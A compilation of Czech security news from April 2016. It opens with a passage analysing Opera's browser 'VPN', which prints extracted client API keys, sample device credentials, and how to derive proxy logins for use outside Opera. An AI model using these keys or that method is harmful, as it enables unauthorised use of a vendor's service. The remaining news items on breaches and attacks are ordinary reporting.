Api.CLIENT_API_KEY_OPERA = '184E166877D1AA1AB7BB702E31DE0EE650442D67529CFEE7DA12FE72455EF32D';
Api.CLIENT_API_KEY_CHROME = '37403FC0A1C5C5FCDAAF7A31253A855AC900BEE2CFF2AB3FFF5AEFD83ECB04F9';

api.js z surfeasy-proxy-an-opera-software-company-1.2.3–1.crx

Druhý požadavek browser posílá na https://api.surfeasy.com/v2/re­gister_device, server nazpět pošle device_password a device_id, těmito údaji se poté browser autorizuje proxy serveru (kterému Opera říká VPN server)

"data" : {
"device_password" : "C74891C1220057FBC43B1C403D6D10916F609DFB678D04BAB39303646E14CA77",
"client_type" : "se0304",
"device_id" : "se0304-30e2096eed63607b34b36af"
},

Příchozí id a heslo

Požadavkem poslaným na https://api.surfeasy.com/v2/geo_list pak Opera zjišťuje, kde všude po světě jsou dostupné VPN proxy servery.

V odpovědi na poslední, čtvrtý požadavek se Opera konečně dozví, jaké IP adresy jednotlivé proxy servery mají a v jaké zemi se ten který server nachází. Nějakou vnitřní magií si vybere jednu IP adresu, v mém případě to byla adresa 185.108.219.42, ke které prohlížeč přiřadil jméno de0.opera-proxy.net a server s tímto jménem pak používal jako proxy server. Jméno de0.opera-proxy.net jde přeložit na IP pouze a jen v Opeře a jen když je zapnutá “VPN”, Opera pravděpodobně používá nějak upravený resolver.

Kompletní záznam všech požadavků a odpovědí najdete u mě na GitHubu. Vytvořil jsem také jednoduchý skript v Pythonu, který všechny ty požadavky pošle a zpracuje tak, jak to nejspíš dělá i samotná Opera. Nazval jsem ho The Oprah Proxy.

Proxy servery jako např. de0.opera-proxy.net vyžadují jméno a heslo, heslo prohlížeč zná z odpovědi na druhý API požadavek ( device_password), jméno je vypočítané jako sha1(device_id). Když toto jméno a heslo získáte, třeba tak, že si v browseru zachytíte požadavek na proxy server, který jméno a heslo obsahuje v hlavičce Proxy-Authorization, tak se pak na proxy servery Opery můžete připojit i z jiného počítače, na kterém Opera vůbec není nainstalována. Jsou to klasické HTTP(S) proxy servery, které vyžadují ověření, ne VPN servery.

Od těch klasických běžných HTTP proxy serverů se přece jen ve dvou věcech odlišují: za prvé, browser se na ně připojuje vždy pomocí šifrovaného HTTPS, a to i přesto, že se zrovna snaží načíst stránku pomocí nešifrovaného HTTP a za druhé, překlad domény na IP adresu se provádí až na tom proxy serveru, nedělá ho samotný prohlížeč, takže z browseru bokem neutíkají nešifrované dotazy do DNS. Díky tomu si celkem oprávněně zaslouží název “secure proxy”.

Proxy vyžaduje ověření
Je tu ještě několik důležitých drobností. Nastavení “VPN” přežije restart browseru, což znamená, že device_id (a tedy uživatelské jméno pro přihlášení na proxy) zůstává stejné, i když browser vypnete a zase zapnete. Toho by se dalo využít pro sledování chování uživatelů, a reklamní průmysl by jistě věděl, co s takovými daty dělat. Parametr device_id přežije dokonce i reinstalaci browseru, pokud při odinstalaci nevyberete, že chcete smazat i uživatelská data.

“VPN” v Opeře má ještě jeden problém. Může prozradit vaši IP adresu, i když jste připojeni přes tuto “VPN”. K vyzrazení se dá zneužít WebRTC, které adresu leakne. Vyzkoušet si to můžete na https://ipleak.net/. Pokud jste připojení přes opravdovou VPN, tak by k vyzrazení vaší IP adresy docházet nemělo.

Opera Software ve své zprávě tvrdí, že jejich “VPN” je lepší, než tradiční VPN. No, jak se to vezme. Není to VPN, nezabezpečí to všechna spojení tak jako VPN, ale umí to vyzradit vaši IP adresu a má to potenciální sledovací možnosti a je to zdarma a neomezené. Odpovězte si raději sami.

Podobných “VPN” bude jistě víc, ale pokud si chcete vybrat nějakou opravdovou VPN, může vám pomoci třeba tento rozsáhlý přehled porovnávající VPN služby. SurfEasy, tedy služba, kterou Opera používá, tam nemá zrovna nejlepší hodnocení, údajně má zaznamenávat IP adresy klientů používajících službu, ačkoliv v Privacy Policy aktualizované 18. dubna už tvrdí, že to nedělá.


Další únik údajů ze seznamky: data milionu uživatelů BeautifulPe­ople.com

27.4.2016 Zdroj: Lupa.cz Incidenty

Pokud jste stále nepochopili: kamkoliv na internetu vložíte jakákoliv osobní data, musíte počítat s tím, že se dříve nebo později mohou stát věcí veřejnou.
Reálné údaje o více než milionu uživatelů seznamky BeautifulPeople.com jsou dostupné na internetu. Jde přitom o následek hacku z konce minulého roku, o kterém se ví už někdy od listopadu 2015. Co je na celé kauze podstatného a nového je to, že jde o reálná data. Provozovatel celou dobu tvrdil, že se útočníkům podařilo dostat pouze na testovací server, na kterém neměla být ostrá databáze.

Plyne z toho jedno poučení uvedené v perexu, tedy to, že pokud komukoliv svěříte nějaké informace (osobní zejména), tak musíte počítat s tím, že dříve či později dojde k nějakému jejich úniku. A zadruhé, že pokud k něčemu takovému dojde, tak jde obvykle pravdomluvnost stranou a provozovatelé se snaží lhát a lhát.

Data z BeautifulPeople.com jsou už i na prodej, uvádí to alespoň Troy Hunt, provozovatel užitečné služby haveibeenpwned.com. Ale uvádí také, že neví, kdo je prodává ani jaká je cena. Dobré je, že na výše uvedené službě si přítomnost účtu z BeautifulPeople.com můžete ověřit.

Ve zpřístupněných datech mají být e-maily, telefonní čísla, ale také osobní charakteristiky uživatele, obvyklé u seznamek.

Compromised data: Beauty ratings, Car ownership statuses, Dates of birth, Drinking habits, Education levels, Email addresses, Genders, Geographic locations, Home ownership statuses, Income levels, IP addresses, Job titles, Names, Passwords, Personal descriptions, Personal interests, Physical attributes, Sexual preferences, Smoking habits, Website activity

A jak už to tak chodí, Hunt uvádí, že mezi 1,1 miliony e-mailů je i 170 vládních s doménou .gov. Nepoučitelní lidé se do seznamek stále registrují s pracovními e-maily.


Když český státní úřad a americký operátor AT&T pořádají hackathon

27.4.2016 Zdroj: Lupa.cz Kongresy

Český telekomunikační úřad opět ukázal, že se myšlení zbytku státní správy trochu vymyká a uspořádal vlastní hackathon. Připojil se i obr AT&T.
Viděli jste někdy vysoce postaveného státního úředníka, jak si vezme tričko, dá si pivo a dorazí na hackathon? Český telekomunikační úřad (ČTÚ) pod vedením Jaromíra Nováka opět ukázal, že je ve zdejším státním prostředí tak trochu anomálie. Úřad tento víkend uspořádal CTU and AT&T V4 hackathon.

Akci společně s americkým velvyslancem v Praze Andrew Shapirem otevřel i vicepremiér Pavel Bělobrádek (KDU-ČSL), který se čas od času veřejně k (alespoň slovní) podpoře digitální agendy přihlásí. Jenže jeho řeč mezi liberální internetovou společností působila poněkud zvláštně – v podstatě zde obhajoval nedávno schválené blokování stránek v rámci boje s internetovým hazardem.

Podle mnohých jde o cenzuru. Bělobrádek ale hájí vládní politiku a například v následné malé debatě na Twitteru uvedl, že „cenzura a pravidla jsou něco jiného“.

S penězi od AT&T

Zajímavé je zapojení amerického operátora AT&T, který se stal partnerem hackathonu. AT&T je vnímaný především jako tradiční značka působící na severoamerickém trhu, byznys se službami ale rozvíjí po celém světě a v českém prostředí je zakořeněn poměrně hodně. V takzvaném centru sdílených služeb v Brně pro AT&T pracuje už přes tisíc lidí. Nejde pouze o zaměstnance call centra, ale také techniky a další odborníky.


AT&T z Moravy obsluhuje zákazníky v Evropě, Africe a na Blízkém východě. Z Brna se řeší zejména telekomunikační služby a sítě. Firma má v současné době otevřeny desítky pracovních míst, hledá i specialisty na sítě, storage, Linux či OpenStack.

AT&T na Moravě spolupracuje i se školami a otevřela laboratoře a koncem dubna chystá i den otevřených dveří. Ve své podstatě jde každopádně o tradiční nadnárodní korporaci se všemi výhodami i nevýhodami. Zaměstnanci si pochvalují možnosti růstu, stabilní prostředí či přístup k hardwaru, stěžují si naopak na byrokracii, procesy, limitované růsty platů a podobně.

Americký operátor (proto i účast Shapira na startu) si prostřednictvím hackathonů a podobných akcí buduje povědomí mezi IT komunitou a aktivity tohoto druhu rozvíjí už několik let. Jde i o formu náborové kampaně. Ostatně podobně to dělají mnohé jiné firmy z oboru. AT&T rovněž na hackathonu poskytl vlastní platformu pro internet věcí, konkrétně AT&T M2X, a také poradce.


Zaměření akce je byznysu AT&T blízké. Vývojáři měli k dispozici zařízení typu Arduino či beacony od Kontakt.io, takže se daly rozvíjet i koncepty internetu věcí, hardwarové komunikace a podobně. Tedy něco, co dnes operátory dost zajímá. ČTÚ a americký operátor AT&T se do kontaktu a prvních námluv dostali během předsednictví Česka v rámci V4.

Sám v autobusu

ČTÚ zase od hackathonu očekává rozvoj nových oblastí. „Akce tohoto typu je přesně to, co v současné době region V4 v podpoře inovací potřebuje. Je to báječná příležitost, abychom akcelerovali právě probíhající rozvoj internetu věcí a využití otevřených dat veřejné správy,” věří předseda úřadu Jaromír Novák. Později dodal, že mu hackathon „potvrdil, že tahle země má obrovský potenciál“ a že se nemá promarnit.


Do akce se zapojili také partneři CZ.NIC, Y Soft Ventures a Credo Ventures, dorazil i prezident AT&T pro oblast EMEA Vladimir Slamecka. Zatímco na jiných hackathonech se často za odměnu dává pocit z dobře odvedené práce, přístup k nějaké cloudové platformě, pizza a Red Bull zdarma či nějaké to pěkné tričko, tato akce díky AT&T přinesla na odměnách celkem 15 tisíc dolarů.

Stačilo uspět v jedné ze čtyř oblastí a napsat aplikaci pro chytrá města, open data, vzdělávání nebo open source projekt následně uvolněný pro komunitu. Do pražského hotelu Pyramida nakonec dorazilo odhadem kolek čtyřiceti účastníků několika národností a často tu zněla angličtina.

Deset tisíc dolarů nakonec vyhrála aplikace Babble, která má „vracet lidi od technologií do reálného kontaktu“, zejména v hromadné dopravě. CZ.NIC zase udělil cenu za open source projektu DámeMatiku, který je už k dispozici na GitHubu. Feed dalších fotek a tweetů je možné si vyfiltrovat na Twitteru.


Na návštěvě v bezpečnostním dohledovém centru O2 ITS
27.4.2016 Zdroj: Root.cz 
Zabezpečení

Společnost O₂ IT Services představila „Security Expert Center“. Jeho službu nabízí nejen těm, kteří spadají pod zákon o kybernetické bezpečnosti, nýbrž komukoli, kdo zpracovává citlivá data.
V úterý 19. dubna otevřela společnost O₂ IT Services formálně svoje komerční dohledové středisko. Na prohlídku pozvala novináře i možné zákazníky.

Běžně jsou podobná centra známa jako SOC — security operations center. Z obchodních důvodů se v O₂ ITS rozhodli pro název „Security Expert Center“, aby bylo zákazníkům už ze zkratky SEC zřejmější, že jde o bezpečnost.

Středisko chystali od loňského března. V provozu je opravdu od počátku prosince a zatím má šest zákazníků. O₂ ITS je ovšem nejmenuje, ale jsou to dílem velké státní instituce (například ministerstva) spadající pod zákon o kybernetické bezpečnosti a dílem zákazníci komerční, a to zatím spíše střední nebo menší.

O₂ ITS sice dodává nebo upravuje také řešení na straně zákazníka, ale SEC je pojato především jako služba za stálý měsíční poplatek. Pro jak malé zákazníky dává smysl? Setkali jsme se i s právními kancelářemi o dvou počítačích, kde se ale spravují důležité smlouvy. Vezmu‑li to na objem dat, chodil by nám od nich tak gigabajt denně a stáli bychom je asi dvacet tisíc měsíčně. Uvážíte‑li, že výstavba vlastního SIEM začíná od dvou miliónů…, odhaduje analytik Petr Tejnský.

SIEM: Security Information and Event Management, tedy řízení informační bezpečnosti a bezpečnostních událostí, vlastně průběžný dohled nad síťovým provozem a sběr záznamů o něm, a možnost analýzy a protiopatření v případě mimořádného jevu, který může znamenat narušení bezpečnosti. (Pojmu SIEM poprvé užil patrně Gartner v roce 2005.)

SEC je prozatím připraven obsloužit asi čtyřicítku zákazníků různé velikosti. Indexovat může celkem 1,7 TB příchozích dat denně (asi sto tisíc EPS, tedy událostí za sekundu). Největší zákazníky vyjde bezpečnostní dohled od SEC zhruba na tři sta tisíc korun měsíčně.

Jak je postaveno

U zákazníka musí být sběrač čili kolektor dat o síťovém provozu a síťových zařízeních. Zpravidla se dodává jako zařízení virtuální (virtual appliance), leč kdyby zákazník neprovozoval žádný virtuální stroj, lze mu dodat sběrač jako hardware. Do uživatelských stanic se zavádějí klientské agenty (podporují Windows a Linux/Unix); ty posílají data do sběrače.

SEC používá ke sběru dat Syslog-ng Premium Edition od Balabitu. Sběr je proti výpadkům zajištěn tříúrovňově: klientské agenty dokáží data podržet po 24 hodin, nemají-li spojení s kolektorem; kolektor je podrží po sedm dní, nemá-li spojení do SEC; v SEC se data ukládají nejméně na tři měsíce, a to zašifrovaně, na důvěryhodném a certifikovaném úložišti, udává Petr Tejnský. Veškerá data jsou časově označena, aby nemohlo dojít k manipulaci; jak to požaduje zákon.

Důležitou výhodou Syslog-ng proti třeba Rsyslog a podobným je řízení datového toku, možnost vyhradit jen určitou šířku pásma, vyzdvihuje Tejnský. Většina útoků způsobí množství zpráv ve velmi krátkém čase, bez řízení toku je snadné zahltit celý řetězec.

Sběrač je se SEC spojen buďto skrze VPN, nebo přes Internet s využitím TLS 1.2. Podle toho, co zákazník požaduje, sděluje Tejnský. TLS 1.2 je, myslím si, v zásadě bezpečné. Kdyby mělo dojít k prolomení TLS, dojde i k prolomení VPN, soudí.

Samo SEC je implementováno v „neveřejném cloudu“. Jeho obsluha však nemusí sedět v té místnosti na fotkách, stačí jim notebook a připojení k internetu. (Přístupová práva řídí Shell Control Box od Balabitu.)

Tým SEC má šest pracovníků a šéfa, zatímco partnerská společnost Axenta poskytuje asi desítku administrátorů a vývojářů; právě ona postavila, spravuje a vyvíjí technické řešení SEC.

Úlohy v týmu SEC

Dva operátoři sledují aktivní kanály a ukazatele, zakládají případy a popisují je; nedokáží‑li sami vyhodnotit, že případ je pouze planým poplachem, předávají ho na analytiky.

Tři analytici, vybaveni analytickými nástroji, doporučují a implementují případná protiopatření.

Expert udržuje a rozšiřuje znalostní databázi — rozpoznává nové případy, rozvíjí stávající. Navrhuje nové korelace, filtry, monitory, aktivní seznamy a kanály, ukazatele a hlášení.
Ve středisku se zatím pracuje osm hodin pět dní v týdnu. Ale někdo na to kouká 24/7, ujišťuje Petr Tejnský. Máme ještě interní dohledové centrum. I analytici mohou být dostupní 24/7, ale zákazníci obvykle požadují řešení bezpečnostních událostí následujícího pracovního dne.

Čtvero základních modulů SEC

Aktivní monitorování všech součástí SEC — jak u zákazníka, tak v datacentru. Na rozpoznávání anomálií je nasazen Flowmon ADS.
Správa logů, tedy posbíraných dat: už výše zmíněný Syslog-ng.
Řízení bezpečnosti. Využíváme HP ArcSight ESM, sděluje Tejnský, a to z toho důvodu, že je nativně multitenantní, umožňuje real‑time korelace bezpečnostních událostí různých typů. To není u SIEM nic nového, ale výhodou ArcSightu je včasná a přesná detekce. Nasazování SIEM běžně způsobí množství planých poplachů, ale ArcSight lze velice rychle naučit, co jsou false positives, lze vymezit různé případy pro různé stavy; plané poplachy se jím dají dost omezit.
ArcSight se dále vyznačuje tím, že má rozsáhlou kategorizaci a normalizaci dat a více než tři sta chytrých konektorů už v sobě: připojíte jakékoli zařízení, které požadujete, podporuje SAP, různé aplikace a pod. ArcSight zkracuje řešení běžných incidentů z hodin na minuty.
Tiketovací systém a zákaznický portál: Provozujeme iTop; je to open‑source. Zvolili jsme ho proto, že podle ITIL je to best practice. Obsahuje konfigurační databázi CMDB s auditem změn; bez CMDB nepostavíte správný SIEM. iTop má flexibilní správu tiketů nebo analýzu dopadů a závislostí — například které další servery budou ovlivněny výpadkem určitého serveru; to oceníte i při údržbě, popisuje Tejnský.
Odpovědnost ze zákona zůstane na zákazníkovi
Spadá‑li zákazník do působnosti zákona o kybernetické bezpečnosti, odpovědnost vyplývající ze zákona zůstává na něm, upozorňuje ředitel Národního centra kybernetické bezpečnosti Vladimír Rohel. Dodává, že pro podobná centra zatím NCKB nezamýšlí žádné certifikace: Nechceme na začátku regulovat trh a nemáme na to ani kapacity, vysvětluje. Různé certifikace však mohou mít jednotliví pracovníci centra.

Postavit pořádné dohledové centrum je velká investice. Je na vás, abyste si vypsali soutěž tak, aby vám z ní nevyšla garážovka, a musíte si dobře sepsat i smlouvu, doporučuje Rohel. Ředitel komerční divize O₂ IT Services Václav Provazník doplňuje: Do našich smluv dáváme, že zajišťujeme soulad se zákonem o kybernetické bezpečnosti.


Sophos nabízí UTM s podporou sandboxingu i pro malé firmy

27.4.2016 Hardware
Novou variantu svého UTM řešení – verzi 9.4 – rozšířil Sophos o technologii sandboxingu a zpřístupňuje ji tak i malým či středním firmám. Kromě toho se v UTM 9.4 objevují i funkce jako WAF, VPN a také nové hardwarové možnosti příslušného zařízení.

Ačkoliv je tradiční zabezpečení proti malware stále klíčovou součástí první linie obrany, není již nadále pro ochranu před moderními útoky dostatečná.

Většina řešení sandboxingu nové generace navržených k odhalování neznámého malware je prý ale příliš složitá a drahá na to, aby o ní mohly malé a střední podniky uvažovat.

Sophos ale představil nástroj Sandstorm, který se dodává formou předplatného. Jde o cloudové řešení, které zajišťuje ochranu proti cíleným útokům, vizibilitu a analýzu právě prostřednictvím technologie sandboxingu.

Další vylepšené funkce firmwaru Sophos UTM 9.4 podle výrobce:

WAF Persistent Session Cookies zvyšuje uživatelský komfort při práci s firemními aplikacemi, které jsou chráněny řešením Sophos UTM s omezením opakovaných výzev k přihlášení.
STAS (Sophos Transparent Authentication Suite) zajišťuje uživatelům sítě spolehlivé a transparentní ověření identity SSO bez nutnosti vlastnit klienta na koncovém bodě. STAS využívá aplikaci v rámci Microsoft Active Directory Server, která sleduje a ukládá případy autentifikace a vyměňuje si tyto informace s UTM, což uživatelům usnadňuje stanovení a vynucování bezpečnostních zásad.
IPv6 SSL VPN Support přidává u řešení UTM podporu konektivity s IPv6 VPN.


ICT technologie mění budoucnost bezpečnosti

27.4.2016 Bezpečnost
Ericsson přišel se studií, která se zabývá problematikou a využitím informačních technologií v souvislosti s budoucností veřejné bezpečnosti. Ke zlepšení efektivity a pruduktivity mohou významnou měrou přispět právě technologie, přičemž základním východiskem je pochopení a řízení systému toku informací.

Klíčovým faktorem výsledku zásahu je vždy čas, který uplyne mezi momentem nahlášení mimořádné události a reálným příjezdem pohotovostních složek. Například ze studie Skotské záchranné služby a Glasgow University vyplynulo, že zkrácení doby odpovědi zdravotní záchranné služby z patnácti na pět minut zdvojnásobilo míru přežití pacientů se srdečním infarktem.

Organizace, jejichž úlohou je zachraňovat životy lidí by mimo jiné měly být schopné koordinovat všechny ostatní složky zapojené do zásahů v případě ohrožení.

„Tuto schopnost podporuje celá škála systémů. Každý z nich je možný implementovat samostatně, ICT technologie však umožňují sdílení informací a zdrojů, což přispěje ke zvýšení jejich efektivity,“ říká Jiří Rynt ze společnosti Ericsson.

Proces vývoje efektivních řešení na bázi ICT začíná u jejich struktury a vychází z úlohy, kterou má organizace plnit. Každý zásah pohotovostních složek sestává z hierarchicky uspořádaných kroků zahrnujících vybavení, systémy nebo lidské zdroje.

Jednotlivé organizace musí individuálně vyhodnotit, jakým způsobem mohou ICT technologie změnit každou úroveň této hierarchie. Patří sem faktory jako jednoduchost a dostupnost zavádění, které by měly vést organizace k využívání řešení založených na otevřených standardech.


Towelroot: Uživatelé starších Androidů v ohrožení

26.4.2016 Android
Útočníci zneužili dříve nevídaným způsobem Towelroot, aby uživatelům starších Androidů do systému v tichosti nainstalovali škodlivý software.

Uživatelé starších verzí Androidu můžou mít problém. Útočníci našli novou fintu, jak jim do systému nainstalovat ransomware z webových stránek se škodlivými reklamami. Podobné útoky vedené skrze prohlížeče nebo jejich plug-iny jsou běžné na počítačích s operačním systémem Windows, nikoliv však na Androidech, kde je bezpečnostní model efektivnější.

Nový drive-by útok teď objevili vývojáři z týmu Blue Coat System, když jejich testovací tablet Samsung běžící s ROMem CyanogenMod 10.1 (postaveném na Androidu 4.2.2) infikoval po návštěvě škodné webové stránky ransomware.

„Tohle je, pokud je mi známo, poprvé, kdy byli útočníci schopni úspěšně nainstalovat škodlivou aplikaci do mobilního zařízení bez jakékoliv interakce nebo přispění uživatele,“ říká Andrew Brandt z Blue Coat. „Zařízení během útoku nezobrazilo standardní box s povolením práv, který normálně instalaci androidové aplikace předchází.“

Další analýza ukázala, že škodlivá reklama obsahovala JavaScript kód, který využil od loňska známé slabiny v knihovně libxslt. Po následném spuštění ELFu s názvem module.so se útočník mohl dostat až k root právům a jejich zneužitím stáhnout a v tichosti nainstalovat APK v podobě ransomwaru známého jako Dogspectus nebo Cyber.Police.

Ten, na rozdíl od jiného ransomwaru, nešifruje soubory, ale namísto toho zobrazí falešné varování (vydávající se za zprávu oficiálních úřadů), že na zařízení byla zjištěna nezákonná aktivita a majitel proto musí zaplatit pokutu. Aplikace zároveň oběti znemožní dělat se zařízením cokoliv dalšího, dokud nezaplatí nebo neprovede tovární reset. Druhá možnost však z telefonu smaže veškeré soubory, je proto lepší se předtím připojit k počítači a zálohovat je.

„Zásadní je, že starší zařízení, která nebyla aktualizována (a nejspíš ani nebudou) posledním Androidem, mohou být vůči této hrozbě zranitelná už napořád,“ uvádí Brandt.

Díra využívající ELFu module.so je ve světě Androidářů už několik měsíců známá jako Towelroot a primárně není škodlivá. Někteří uživatelé ji dokonce účelově využívají k rootování svých zařízení a odblokování některých bezpečnostních opatření či funkcí, které nejsou běžně přístupné.

Jelikož však mohou být snadno zneužity, Google aplikace určené k rootování považuje za potenciálně nebezpečné a jejich instalaci blokuje prostřednictvím funkce Verify Apps (ovládat lze následovně: Google Settings – Security – Scan device for security threats). Nejlepším doporučením je však upgradeování Androida na nejnovější verzi obsahující bezpečnostní patche a vylepšení.

V případě, že už zařízení aktualizace nepodporuje, uživatelé by podle Googlu měli omezit surfování po internetu a místo defaultního anroidího prohlížeče nainstalovat Chrome.


Diskusní server Lapiduch hlásí hack, útočníci zřejmě mají databázi s hesly

26.4.2016 Zdroj: Lupa Hacking

Debatní server je momentálně mimo provoz. Pokud používáte stejné heslo i na jiných webech, změňte si je, doporučují provozovatelé.
„Diskuzní server Lapiduch je momentálně mimo provoz z důvodu narušení bezpečnosti. Domníváme se, že útočník získal databázi uživatelů, obsahující e-mailové adresy a přístupová hesla na Lapiduch,“ informuje momentálně titulní stránka Lapiduch.cz.

Provozovatelé tradičního diskusního serveru rozeslali také e-maily všem uživatelům, kteří na něm měli založené účty.

„Tento mail dostavate proto, ze jste si v minulosti pod touto e-mailovou adresou zalozili ucet na diskuznim serveru lapiduch.cz. Je mozne, ze to bylo jiz opravdu davno, nektere ucty existuji pres 10 let,“ píší ve zprávě.

Všem uživatelům pak doporučují, aby si v případě, že používají stejné heslo i na dalších službách, své přístupové údaje změnili. „Hesla v databázi sice nejsou v otevřeném formátu, ale dá se očekávat, že mohou být prolomena,“ přiznávají.

Zároveň podle nich není jasné, zda server, který má nejlepší leta za sebou, ještě vůbec vstane z popela. „Momentálně debatujeme nad tím kdy, jestli, a v jaké podobě obnovíme provoz,“ píší.


Stránky ČSSD nefungovaly. Může za to DoS útok, říká strana

26.4.2016 Zdroj: Lupa Počítačový útok

Web vládní strany se od noci potýkal s problémy. Teď nejede vůbec. Server podle oficiálního vyjádření vyřadili z provozu neznámí útočníci.
Aktualizováno 11:31: Stránky se po jedenácté hodině dopolední zase rozjely.

Už se to řeší. „Mohu potvrdit snahu jednotlivce nebo skupiny přetížit náš server. Podle našich informací jde o takzvaný DoS útok. Samotný obsah webu by měl zůstat nedotčen a do našeho systému se nikdo neautorizovaný nedostal,“ potvrdil Lupě mluvčí strany Michal Kačírek.

Podle Kačírka teď jejich správce pracuje na tom, aby se web znovu rozjel. „Útočníci neustále mění své IP adresy a servery a my se snažíme zastavit ten proud požadavků na náš server,“ dodává Kačírek.

Po průniku do soukromé e-mailové schránky premiéra Bohuslava Sobotky jde o další internetový útok na vládní ČSSD.


Ochranu mezibankovního systému SWIFT prolomili hackeři, tvrdí firma

25.4.2016 Ochrany

Hackeři, kteří ukradli 81 milionů dolarů z bangladéšské centrální banky, se pravděpodobně dostali i do globálního finančního systému.
Systém, kterým komunikují banky po celém světě, se dosud pozornosti hackerů vyhýbal, ale to už teď neplatí. Podle agentury Reuters byl systém SWIFT při posledním útoku napaden. Tvrdí to prý britský bezpečnostní konzultant, firma BAE Systems.

Cílem útoku byl klient komunikačního systému, v němž má podíl kolem tří tisíc finančních institucí. Jako zbraň zvolili útočníci malware. Podle mluvčí SWIFTu Natashy Deteran by měla firma provozující systém dnes vydat update, který má zalátat objevené díry.

Útok na centrální banku v Bangladéši se snažil z peněžního domu získat 951 milionů dolarů. Většina plateb byla ale zablokována a nakonec se útočníkům povedlo na filipínské účty dostat jen zlomek – 81 milionů. I tak jde ale o zajímavou sumu.

Nový přístup hackerů bude muset zabezpečení v bankách posunout na novou úroveň. Globální systém je prostřednictvím upravených klientů SWIFTU mnohem zranitelnější, než by se mohlo zdát. Přes jeho systém totiž tečou data i komunikace mezi bankami.

Natasha Deteran ještě pro Reuters dodala, že bezpečnostní update by měl zkontrolovat i databáze, jestli v nich nejsou nějaké nesrovnalosti. Podle ní ale útok by neměl mít dopad na samotné jádro služby nebo sítě.

S teorií, že za hackem stojí zmanipulovaný klient SWIFTu označovaný jako Alliance Access, přišlo britské BAE. To chce také během dneška publikovat další detaily na svém blogu.

Dnes SWIFT (Society for Worldwide Interbank Financial Telecommunication) používá kolem jedenácti tisíc bank a institucí po světě. Ne všechny ale využívají Alliance Acces.

Podle bezpečnostních expertů šlo o vysoce profesionální útok. Adrian Nish z BAE tvrdí, že takhle propracovaný model útoku ještě za svou kariéru nepotkal.

Mluvčí bangladéšské banky odmítl zjištění BAE komentovat. A tamní vyšetřovatelé tvrdí, že zatím nenašli žádný malware, který popisuje bezpečnostní firma. Vyšetřování ale ještě nebylo dokončeno.

Policejní vyšetřovatelé ale poukazují na to, že průnik do banky nemusel být nakonec moc složitý, protože zabezpečení banky bylo velmi slabé. Chyběly prý i základní věci jako třeba firewally.

Banka v Bangladéši není podle BAE jediná, na kterou budou mířit podobné útoky. Proto chce firma zveřejnit technické indikátory, které by mohly správce bankovních sítí připravit. A to včetně IP adres egyptského serveru, který útočníci používali k monitorování SWIFTu v bangladéšské bance.

Samotný malware, pojmenovaný evtdiag.exe, byl navržen tak, aby maskoval stopy útočníků přímo v databázi SWIFTu. Podle Nishe je to ale jen součást hackerského toolkitu, který nainstalovali v systému potom, co získali administrátorská práva.


Prohlížeč Opera dostává bezplatné připojení k VPN

25.4.2016 Zabezpečení
Prohlížeč Opera dostává bezplatné připojení k VPNVčera, Milan Šurkala, aktualitaInternetový prohlížeč Opera dostal další zajímavou funkci v podobě VPN připojení zdarma. To umožní zvýšit bezpečnost např. při připojení k veřejné Wi-Fi nebo obcházet regionální omezení různých serverů.
Autoři internetového prohlížeče Opera se nevzdávají a přichází s další, tentokrát dosti netradiční funkcí. Po integraci blokování reklamy bez jakýchkoli plug-inů přichází podpora bezplatného VPN připojení. Zatímco přístupy k VPN serverům jsou obvykle placené, případně jde o VPN zdarma pro pracovní či vzdělávací účely, Opera nabídne možnost využít VPN servery naprosto bezplatně. Není tedy třeba instalovat žádného VPN klienta třetí strany, funkce je nativně v prohlížeči. Důvody pro VPN připojení mohou být různé. Hodí se to např. na veřejných Wi-Fi sítích, kdy šifrování komunikace přes VPN může výrazně zvýšit bezpečnost připojení. VPN se dá ale používat i méně legálně tím, že počítač se pak může tvářit, že je umístěn v jiné zemi a může tak mít přístup k obsahu, který by ale neměl být v dané zemi přístupný.

V minulosti toto řešilo např. BBC u svého iPlayeru, je to ale běžné u drtivé většiny služeb, které mají restrikce v závislosti na tom, kde se nachází počítač, který se snaží k dané službě připojit. Podle statistik VPN použilo nebo používá více než půl miliardy lidí (24 % internetové populace). Důvody jsou např.:
přístup k zábavnému obsahu (38 %)
zvýšení anonymity při procházení internetu (30 %)
zajištění přístupu k omezeným sítím a stránkám ve vlastní zemi (28 %)
zajištění přístupu k podnikové pracovní síti (27 %)
komunikace s rodinou v zahraničí (24 %)
přístup k omezenému novinářskému obsahu ve vlastní zemi (22 %)